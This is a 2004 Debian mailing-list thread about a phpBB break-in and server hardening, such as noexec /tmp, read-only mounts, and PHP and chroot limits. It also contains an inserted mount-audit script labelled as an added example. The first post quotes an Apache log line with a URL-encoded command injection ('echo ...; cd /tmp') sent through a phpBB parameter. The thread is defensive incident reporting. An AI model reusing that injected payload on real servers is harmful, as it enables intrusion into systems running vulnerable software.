Re: phpBB vulnerability exploited

2005-01-12 Thread Wacquiez Sébastien
Fraser Campbell wrote:
> On Sunday 12 December 2004 17:46, Marek Podmaka wrote:
> >  I don't want to give hints on how to exploit this, but the attacker
> >  did wget the .tgz file, unpacked it in /tmp and ran the program.
> >  So update all your phpBB installations ASAP (and of course all
> >  installations of your customers).
>
> On a somewhat related note ...
> I have the habit of mounting /tmp with noexec,nosuid,nodev.  I also mount /usr
> and /boot ro.  These minor changes can prevent common automated attacks
> (probably the one you encountered) and don't cause any problems.

It can cause problems with the default invocation of logrotate (starting 
with version ... huu ... 7.something.somethingelse, the postrotate 
script is dumped in a file and executed (before, it was in a system())).

But you can quickfix this problem with an export of TMPDIR in the 
crontab script (of logrotate).

Wacquiez Sébastien



Re: phpBB vulnerability exploited

2005-01-11 Thread Lucas Albers

Francesco P. Lovergine said:

> I run apache using dchroot to avoid the most common problems.
> Breaking a chroot is possible, but not so easy and it's more
> difficult within dchroot which _should_ drop privileges properly AFAIK

Re: phpBB vulnerability exploited

2004-12-14 Thread Jerome Vandenabeele
Hi Fraser,

On Mon, 13 Dec 2004 07:53:38 -0500
Fraser Campbell <[EMAIL PROTECTED]> wrote:
> In my case I doubt it since much of postfix lives there.  It might be
> possible in certain cases though I'm not sure.
Maybe you could make 2 partitions:
/var mounted noexec and /var/spool/postfix mounted exec

Greetings
Jerome Vandenabeele


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: phpBB vulnerability exploited

2004-12-14 Thread martin f krafft
also sprach Jerome Vandenabeele <[EMAIL PROTECTED]> [2004.12.14.1200 +0100]:
> Maybe you could make 2 partitions: /var mounted noexec and
> /var/spool/postfix mounted exec

I hope you are running a 2.6 kernel if you rely on the exec flag.
Sorry for barking into this thread, which I have not followed. When
I see PHP, I say no.

Aren't postinst files also executed from within /var?

-- 
Please do not send copies of list mail to me; I read the list!
 
 .''`. martin f. krafft <[EMAIL PROTECTED]>
: :'  :proud Debian developer, admin, user, and author
`. `'`
  `-  Debian - when you have better things to do than fixing a system
 
Invalid/expired PGP subkeys? Use subkeys.pgp.net as keyserver!




Re: phpBB vulnerability exploited

2004-12-13 Thread Francesco P. Lovergine
On Mon, Dec 13, 2004 at 01:44:41PM +0200, Boris Pavlov wrote:
> 
> limit with php opendir. make another tmp directory, and set php temp dir, 
> with all permissions you want. limit the system function, if you don't need 
> it. they are per-vhost apache settings, check the manuals. 
> 

I run apache using dchroot to avoid the most common problems.
Breaking a chroot is possible, but not so easy and it's more 
difficult within dchroot which _should_ drop privileges properly AFAIK.
I do that commonly for hosting services where users can run their own
php and cgi scripts. That cannot avoid the creation of shell services, surely,
but it avoids password cracking, use of cron, access to kernel modules
and log files, and so on.

-- 
Francesco P. Lovergine





Re: phpBB vulnerability exploited

2004-12-13 Thread Fraser Campbell
On Monday 13 December 2004 03:31, Marek Podmaka wrote:

>   Yes, I have been doing the same with /tmp, but some debian packages
>   won't install on noexec /tmp. But there are other directories on my
>   system which are world writable - for example /var/tmp and
>   /var/lock.

If you've configured apt to preconfigure packages (at least I think that's the 
case) then apt will extract some stuff to /tmp and execute it from there.

The solution I use is to temporarily remount partitions with necessary 
permissions during apt's run.  I do this automatically with the following 
commands in apt's config files:

  DPkg::Pre-Install-Pkgs {"mount -o remount,rw /boot";};
  DPkg::Pre-Install-Pkgs {"mount -o remount,exec /tmp";};
  DPkg::Pre-Install-Pkgs {"mount -o remount,rw /usr";};
  DPkg::Post-Invoke {"mount -o remount /boot";};
  DPkg::Post-Invoke {"mount -o remount /tmp";};
  DPkg::Post-Invoke {"mount -o remount /usr";};

I'd think you can get away with linking /var/tmp to /tmp but /var/lock might 
be tricky to get around.

>   Can entire /var be mounted noexec?

In my case I doubt it since much of postfix lives there.  It might be possible 
in certain cases though I'm not sure.

-- 
Fraser Campbell <[EMAIL PROTECTED]> http://www.wehave.net/
Georgetown, Ontario, Canada   Debian GNU/Linux


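The thread keeps coming back to which world-writable mountpoints actually carry noexec,nosuid,nodev and whether /usr and /boot really are read-only. The script below is an added example, not from any poster in the thread: it audits a /proc/mounts-style table for exactly those points. The table embedded here is constructed sample data; on a live system feed it "$(cat /proc/mounts)" instead.

```shell
#!/bin/sh
# Added example (not from the thread): audit mount options for the
# directories discussed above. Input is text in /proc/mounts format:
#   <device> <mountpoint> <fstype> <options> <dump> <pass>
# SAMPLE_MOUNTS is constructed data standing in for a real /proc/mounts.

SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda2 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda3 /var/tmp ext3 rw,nosuid 0 0
tmpfs /var/lock tmpfs rw 0 0
/dev/sda4 /usr ext3 ro 0 0'

# audit_mounts TABLE
# For /tmp, /var/tmp and /var/lock, print "<mountpoint> missing <option>"
# once per absent hardening option. Prints nothing when all three are
# mounted noexec,nosuid,nodev.
audit_mounts() {
    printf '%s\n' "$1" | awk '
        $2 == "/tmp" || $2 == "/var/tmp" || $2 == "/var/lock" {
            for (k in seen) delete seen[k]
            n = split($4, opts, ",")
            for (i = 1; i <= n; i++) seen[opts[i]] = 1
            split("noexec nosuid nodev", want, " ")
            for (j = 1; j <= 3; j++)
                if (!(want[j] in seen)) print $2 " missing " want[j]
        }'
}

# mount_is_ro TABLE MOUNTPOINT
# Exit 0 if MOUNTPOINT appears in TABLE with the "ro" option, else 1.
mount_is_ro() {
    printf '%s\n' "$1" | awk -v mp="$2" '
        $2 == mp {
            n = split($4, o, ",")
            for (i = 1; i <= n; i++) if (o[i] == "ro") found = 1
        }
        END { exit found ? 0 : 1 }'
}

# Stand-alone run over the constructed table.
audit_mounts "$SAMPLE_MOUNTS"
for mp in /usr /boot; do
    mount_is_ro "$SAMPLE_MOUNTS" "$mp" || echo "$mp is not mounted read-only"
done
```

Running it from the Post-Invoke hook shown above would confirm that the remounts were undone after apt finished.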



Re: phpBB vulnerability exploited

2004-12-13 Thread Boris Pavlov
better look at your php4 settings: 

limit with php opendir. make another tmp directory, and set php temp dir, 
with all permissions you want. limit the system function, if you don't need 
it. they are per-vhost apache settings, check the manuals. 

wwell edi 

Fraser Campbell writes: 

> On Sunday 12 December 2004 17:46, Marek Podmaka wrote:
> >   I don't want to give hints on how to exploit this, but the attacker
> >   did wget the .tgz file, unpacked it in /tmp and ran the program. 
> 
> >   So update all your phpBB installations ASAP (and of course all
> >   installations of your customers).
> On a somewhat related note ... 
> 
> I have the habit of mounting /tmp with noexec,nosuid,nodev.  I also mount /usr 
> and /boot ro.  These minor changes can prevent common automated attacks 
> (probably the one you encountered) and don't cause any problems. 
> 
> --
> Fraser Campbell <[EMAIL PROTECTED]> http://www.wehave.net/
> Georgetown, Ontario, Canada   Debian GNU/Linux 




Re: Re[2]: phpBB vulnerability exploited

2004-12-13 Thread Henrique de Moraes Holschuh
On Mon, 13 Dec 2004, Marek Podmaka wrote:
>   Yes, I have been doing the same with /tmp, but some debian packages
>   won't install on noexec /tmp. But there are other directories on my
>   system which are world writable - for example /var/tmp and
>   /var/lock.

If you can make /tmp noexec, you can also make /var/tmp and /var/lock
noexec.

File wishlist bugs against packages that run stuff in /tmp, request that the
maintainer not close it but rather mark it "wontfix" if he doesn't want to
fix the bug (so that we can find which packages do not support noexec /tmp).
Use a consistent subject for this (e.g.:  : does not support noexec
/tmp)

>   Can entire /var be mounted noexec?

No. It will break all chroots, and also dpkg.

-- 
  "One disk to rule them all, One disk to find them. One disk to bring
  them all and in the darkness grind them. In the Land of Redmond
  where the shadows lie." -- The Silicon Valley Tarot
  Henrique Holschuh





Re[2]: phpBB vulnerability exploited

2004-12-13 Thread Marek Podmaka
Hello Fraser,

  Yes, I have been doing the same with /tmp, but some debian packages
  won't install on noexec /tmp. But there are other directories on my
  system which are world writable - for example /var/tmp and
  /var/lock.

  Can entire /var be mounted noexec?

Monday, December 13, 2004, 4:17:19, you wrote:

FC> I have the habit of mounting /tmp with noexec,nosuid,nodev.  I also mount /usr
FC> and /boot ro.  These minor changes can prevent common automated attacks 
FC> (probably the one you encountered) and don't cause any problems.

-- 
  bYE, Marki




Re: phpBB vulnerability exploited

2004-12-12 Thread Fraser Campbell
On Sunday 12 December 2004 17:46, Marek Podmaka wrote:
>   I don't want to give hints on how to exploit this, but the attacker
>   did wget the .tgz file, unpacked it in /tmp and ran the program.
>
>   So update all your phpBB installations ASAP (and of course all
>   installations of your customers).

On a somewhat related note ...

I have the habit of mounting /tmp with noexec,nosuid,nodev.  I also mount /usr 
and /boot ro.  These minor changes can prevent common automated attacks 
(probably the one you encountered) and don't cause any problems.

-- 
Fraser Campbell <[EMAIL PROTECTED]> http://www.wehave.net/
Georgetown, Ontario, Canada   Debian GNU/Linux



phpBB vulnerability exploited

2004-12-12 Thread Marek Podmaka
Hello debian-isp,

  maybe a little off-topic, but I want to remind you of this phpBB
  vulnerability, which is fixed in version 2.0.11 (announced on 18th
  November) which "addresses a potentially serious exploit".

  I am writing this because it's not potential, but real. Two weeks
  ago, someone got into my server and ran a program which gave shell
  access on port 2000 (check your machines). Fortunately it had only
  apache user privileges, but the person tried to run various exploits.
  So I was sure the only option to get to my server was php. When I
  was sure no damage could be done, I left everything and set up 2
  traps - one was periodic running of netstat | grep ":2000" and the
  other was creating world-writable /.bash_history :)

  Today I was lucky, I have IP address probably of the attacker (some
  GSM provider in Romania) and IP of another "hacked" server.
  Searching for that IP in apache logs gave me this:

213.xxx.xxx.xxx - - [11/Dec/2004:04:01:59 +0100] "GET 
/forum/viewtopic.php?t=%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70..
 HTTP/1.1" 200 27712 "-" "-"

  I don't want to give hints on how to exploit this, but the attacker
  did wget the .tgz file, unpacked it in /tmp and ran the program.

  So update all your phpBB installations ASAP (and of course all
  installations of your customers).

-- 
  bYE, Marki

